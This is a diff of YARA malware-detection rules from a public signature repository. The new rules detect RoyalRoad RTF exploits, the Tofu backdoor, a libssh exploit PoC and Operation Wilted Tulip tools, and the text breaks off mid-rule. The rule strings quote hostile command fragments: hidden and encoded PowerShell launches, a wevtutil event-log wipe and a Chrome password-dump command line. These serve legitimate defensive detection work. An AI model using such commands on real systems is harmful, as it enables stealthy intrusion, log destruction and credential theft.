+		author = "nao_sec"
+		id = "366ec9c3-e6ad-5198-88d5-15aa84a8358f"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L133-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d8e59b58b7d9d15b9bbafd70a2e303e2b275f9a81fc66ea60b1ffd4a4601207"
-		score = 75
+		logic_hash = "20031fe6d6a0b2fad43f7e04bb82321c2ea75193f23194edead7ca530af8ac55"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii wide
+		$S1 = "objw2180\\objh300" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nashavm : FILE
+rule SIGNATURE_BASE_Royalroad_RTF_V7 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3abbf636-01f4-547a-98c0-d7bfec07e31a"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/Mrakovic-ORG/NashaVM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4420-L4433"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "9d2af980-a851-533a-b25d-ee52277e319c"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L150-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b472d072c39e35c476fa9f0fbca8bf0125ca9359f2e6aac7da58f66ea1b11ed6"
-		score = 75
+		logic_hash = "da043123cf72e19295634720196d78bef3af89f44cba795dbbcee4c0f5c8159a"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii wide
+		$v7_1 = "{\\object\\objocx{\\objdata" ascii
+		$v7_2 = "ods0000" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and all of ( $v7* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsqlpwn : FILE
+rule SIGNATURE_BASE_Royalroad_Encode_In_RTF : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b533d61a-8693-5c3c-8b31-2117262cad4e"
-		date = "2022-11-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/lefayjey/SharpSQLPwn.git"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4435-L4448"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "66614152-8f9b-5e62-b6bd-ba0286e66d4d"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_royalroad.yar#L168-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9210d12c7a8d5973e33aa7bb559ce1c744fd7a810979bec37f95d731c3b50ac"
-		score = 75
+		logic_hash = "00a703a0d7b3a74ec9bfc8ad0e570ee04b3cb6b7f2c062cc2886b41f6fbea49d"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c442ea6a-9aa1-4d9c-9c9d-7560a327089c" ascii wide
+		$enc_hex_1 = "B0747746"
+		$enc_hex_2 = "B2A66DFF"
+		$enc_hex_3 = "F2A32072"
+		$enc_hex_4 = "B2A46EFF"
+		$enc_hex_1l = "b0747746"
+		$enc_hex_2l = "b2a66Dff"
+		$enc_hex_3l = "f2a32072"
+		$enc_hex_4l = "b2a46eff"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and 1 of ( $enc_hex* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Group3R : FILE
+rule SIGNATURE_BASE_Tofu_Backdoor
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0571d71e-50ca-5c1b-b750-34acc2d06687"
-		date = "2022-11-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/Group3r/Group3r.git"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4450-L4464"
+		description = "Detects Tofu Trojan"
+		author = "Cylance"
+		id = "03848366-f139-5352-959d-390992d96296"
+		date = "2017-02-28"
+		modified = "2023-12-05"
+		reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ham_tofu_chches.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "898569553257991c3776835ec10d5fae697e55bca9c14667ff72c079a095bbf1"
+		logic_hash = "67c49456dbe4dc4c8bc54139ce6d493ea5588392d8c64010d029d7a63ac7f976"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "868a6c76-c903-4a94-96fd-a2c6ba75691c" ascii wide
-		$typelibguid1lo = "caa7ab97-f83b-432c-8f9c-c5f1530f59f7" ascii wide
+		$a = "Cookies: Sym1.0"
+		$b = "\\\\.\\pipe\\1[12345678]"
+		$c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$a or $b or $c
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenstomp : FILE
+
+rule SIGNATURE_BASE_SUSP_ENV_Folder_Root_File_Jan23_1 : SCRIPT FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e4266969-ab03-50dc-b5b1-f4bb1c9846f4"
-		date = "2022-11-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/MartinIngesen/TokenStomp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4466-L4479"
+		description = "Detects suspicious file path pointing to the root of a folder easily accessible via environment variables"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6067d822-5c1b-5b86-863c-fdcfa37da665"
+		date = "2023-01-11"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_indicators.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "931950e70ecfd3e87e535b32bd8af43d70b36670d5e0142e2fb95ed92c85fbd9"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "5355ae567e6255e22f566bae9fe50f4995bafba07c261461d37d5b8ba200d33a"
+		score = 70
+		quality = 83
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$typelibguid0lo = "8aac271f-9b0b-4dc3-8aa6-812bb7a57e7b" ascii wide
+		$xr1 = /%([Aa]pp[Dd]ata|APPDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$xr2 = /%([Pp]ublic|PUBLIC)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$xr4 = /%([Pp]rogram[Dd]ata|PROGRAMDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$fp1 = "perl -MCPAN " ascii
+		$fp2 = "CCleaner" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Krbrelay : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_Libssh_Auth_Bypass_CVE_2023_2283_Jun23_1 : CVE_2023_2283 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f59986c-8bd8-5e70-b3eb-038247d1ccd7"
-		date = "2022-11-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/cube0x0/KrbRelay"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4481-L4495"
+		description = "Detects POC code used in attacks against libssh vulnerability CVE-2023-2283"
+		author = "Florian Roth"
+		id = "e72eba33-686f-5fca-bca3-2b875d1ec224"
+		date = "2023-06-08"
+		modified = "2023-12-05"
+		reference = "https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_libssh_cve_2023_2283_jun23.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5f8a3f6ba7ba5fa59cdc52337f92256257ec0994ae16fce074d70ad5afa3bc6"
-		score = 75
+		logic_hash = "4c3d54d7f4902c1da664e41096b5931e6534aaaf63243f12e05b81af63d8b28f"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-2283, FILE"
 
 	strings:
-		$typelibguid0lo = "ed839154-90d8-49db-8cdd-972d1a6b2cfd" ascii wide
-		$typelibguid1lo = "3b47eebc-0d33-4e0b-bab5-782d2d3680af" ascii wide
+		$s1 = "nprocs = %d" ascii fullword
+		$s2 = "fork failed: %s" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sqlrecon : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tools_Back : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f9ea5283-0a5c-5bde-966c-80869ee25888"
-		date = "2023-01-20"
-		modified = "2025-08-15"
-		reference = "https://github.com/skahwah/SQLRecon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4497-L4510"
+		description = "Detects Chrome password dumper used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f57bd66-b269-5f59-ade1-f881b1d7dadd"
+		date = "2017-07-23"
+		modified = "2022-12-21"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1cf5a34a09ed323aeee69080e2f046b613f18294328529a4cca1c49c14da575"
+		logic_hash = "3a23491cbb24177c027695d8f677c4a72ed0404c4c38356eec4b92f2d06be2ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b7faeaa6163e05ad33b310a8fdc696ccf1660c425fa2a962c3909eada5f2c265"
 
 	strings:
-		$typelibguid0lo = "612c7c82-d501-417a-b8db-73204fdfda06" ascii wide
+		$x1 = "%s.exe -f \"C:\\Users\\Admin\\Google\\Chrome\\TestProfile\" -o \"c:\\passlist.txt\"" fullword ascii
+		$x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" ascii
+		$x3 = "//Dump Chrome Passwords to a Output file \"c:\\passlist.txt\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Certify : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tools_Clrlg : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "69f120fe-bd4d-59ba-b1b9-528ab300e450"
-		date = "2023-03-06"
-		modified = "2025-08-11"
-		reference = "https://github.com/GhostPack/Certify"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4512-L4527"
+		description = "Detects Windows eventlog cleaner used in Operation Wilted Tulip - file clrlg.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6957c97d-2c2d-50ac-8fd5-2f299fc7b5c8"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L31-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "da585a8d4985082873cb86204d546d3f53668e034c61e42d247b11e92b5e8fc3"
-		logic_hash = "cc31eb8f11f8c48d8c6d34c343c273ac085fdac214ffc7521d26b4a19edd0c4c"
+		logic_hash = "003f711ac6f2308f2bdc638da7c654686e7402db7b3837120168e5a99b774537"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf"
 
 	strings:
-		$typelibguid0_v1 = "64524ca5-e4d0-41b3-acc3-3bdbefd40c97" ascii wide
-		$typelibguid0_v2 = "15cfadd8-5f6c-424b-81dc-c028312d025f" ascii wide
+		$s1 = "('wevtutil.exe el') DO (call :do_clear" fullword ascii
+		$s2 = "wevtutil.exe cl %1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aladdin : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Powershell
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f0a954c-f3b3-5e5d-a71d-11f60b026a48"
-		date = "2023-03-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/nettitude/Aladdin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4529-L4544"
+		description = "Detects powershell script used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6246508-a6ff-5a02-a0de-9cde139f0acc"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e038ea5b2caed819df725e454ad31ba00b2b1b356875eecd73f2b8a0908c2e33"
+		logic_hash = "57d28f7b79cc14b8bbc2d7c9b2c16ab0f94a4b160cf7cb1d4641fe1c77e06811"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787"
 
 	strings:
-		$typelibguid0lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
-		$typelibguid1lo = "c47e4d64-cc7f-490e-8f09-055e009f33ba" ascii wide
-		$typelibguid2lo = "32a91b0f-30cd-4c75-be79-ccbd6345de99" ascii wide
+		$x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpldaprelayscan : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Vminst : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "554a5487-ac53-512f-8f6f-ad8186144715"
-		date = "2023-03-15"
-		modified = "2025-08-15"
-		reference = "https://github.com/klezVirus/SharpLdapRelayScan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4546-L4559"
+		description = "Detects malware used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5d21e515-eb7b-56ab-acc2-f09065769b2d"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L62-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0b9573ee9893225c5621d02f99f67296193d93a42390125611fe0560bc95fa9"
+		logic_hash = "a4559c2f4de60537827d167453751a92c0030ae6ce095a2d64df777e93d4b87a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "930118fdf1e6fbffff579e65e1810c8d91d4067cbbce798c5401cf05d7b4c911"
 
 	strings:
-		$typelibguid0lo = "a93ee706-a71c-4cc1-bf37-f26c27825b68" ascii wide
+		$x1 = "\\C++\\Trojan\\Target\\" ascii
+		$s1 = "%s\\system32\\rundll32.exe" fullword wide
+		$s2 = "$C:\\Windows\\temp\\l.tmp" fullword wide
+		$s3 = "%s\\svchost.exe" fullword wide
+		$s4 = "args[10] is %S and command is %S" fullword ascii
+		$s5 = "LOGON USER FAILD " fullword ascii
+		$s6 = "vminst.tmp" fullword wide
+		$s7 = "operator co_await" fullword ascii
+		$s8 = "?ReflectiveLoader@@YGKPAX@Z" fullword ascii
+		$s9 = "%s -k %s" fullword wide
+		$s10 = "ERROR in %S/%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ldapsigncheck : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Windows_UM_Task
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a8b902f0-61a5-509e-8307-79bf557e5f61"
-		date = "2023-03-15"
-		modified = "2025-08-15"
-		reference = "https://github.com/cube0x0/LdapSignCheck"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4561-L4574"
+		description = "Detects a Windows scheduled task as used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d827584e-8298-56e4-8466-90950d1f286e"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L90-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffeee319b4161611e3e792aaec2e74c8e368d69c7f5ba9738105f536590099e8"
+		logic_hash = "cfc2d231b6be798172e5d7ffc525842c7eed6d78a145c401136452c46f21e3b2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3"
 
 	strings:
-		$typelibguid0lo = "21f398a9-bc35-4bd2-b906-866f21409744" ascii wide
+		$r1 = "<Command>C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide
+		$p1 = "<Arguments>\"C:\\Users\\public\\" wide
+		$c1 = "svchost64.swp\",checkUpdate" wide ascii
+		$c2 = "svchost64.swp,checkUpdate" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		($r1 and $p1 ) or 1 of ( $c* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsccm : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Windowstask
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "276269b1-e3b3-5774-a86a-1c3a8bca8209"
-		date = "2023-03-15"
-		modified = "2025-08-15"
-		reference = "https://github.com/Mayyhem/SharpSCCM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4576-L4590"
+		description = "Detects hack tool used in Operation Wilted Tulip - Windows Tasks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad8193f0-e664-50a8-ab05-38027a2e33cd"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L109-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a6650a1a2ad710b85363ea04d66f2467b835bc7bd1097404238f67e07cc3f719"
+		logic_hash = "a2bbcb02f34b2da3d88772d211cc7bfb669384161eec94336cdc2474144b16ae"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c"
+		hash2 = "340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d"
+		hash3 = "b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01"
+		hash4 = "5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a"
+		hash5 = "984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34"
 
 	strings:
-		$typelibguid0lo = "03652836-898e-4a9f-b781-b7d86e750f60" ascii wide
-		$typelibguid1lo = "e4d9ef39-0fce-4573-978b-abf8df6aec23" ascii wide
+		$x1 = "<Command>C:\\Windows\\svchost.exe</Command>" fullword wide
+		$x2 = "<Arguments>-nop -w hidden -encodedcommand" wide
+		$x3 = "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Koh : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Tdtess : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9702526c-b10d-553d-a803-47e352533858"
-		date = "2023-03-18"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/Koh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4592-L4605"
+		description = "Detects malicious service used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0ecb391b-a4f9-5362-bb65-73801ae497de"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L130-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dbb36a1a8f559d10152d14459509408b14f3dc52a685d81f3a3d5e936f5e2a66"
+		logic_hash = "ffd10e06b3a8f3054747443b863070e8726589fc795f816832dbf73c0c34e080"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3fd28b9d1f26bd0cee16a167184c9f4a22fd829454fd89349f2962548f70dc34"
 
 	strings:
-		$typelibguid0lo = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii wide
+		$x1 = "d2lubG9naW4k" fullword wide
+		$x2 = "C:\\Users\\admin\\Documents\\visual studio 2015\\Projects\\Export\\TDTESS_ShortOne\\WinService Template\\" ascii
+		$s1 = "\\WinService Template\\obj\\x64\\x64\\winlogin" ascii
+		$s2 = "winlogin.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Forgecert : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Silverlightmsi : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "06b3ffbb-5a76-50a0-86dc-b9658bf2d7ec"
-		date = "2023-03-18"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/ForgeCert"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4607-L4620"
+		description = "Detects powershell tool call Get_AD_Users_Logon_History used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6430d464-b9c7-5f19-b89d-3c70f99af688"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L149-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4cb79315afc5aae2b35a1d171e8cff34304534a8970b51831568d34135e5c5e6"
+		logic_hash = "716db8f8e7d71c7f3deaeb9ac8e141c9bf374e5dae992e8e2623070c81089953"
 		score = 75
 		quality = 85
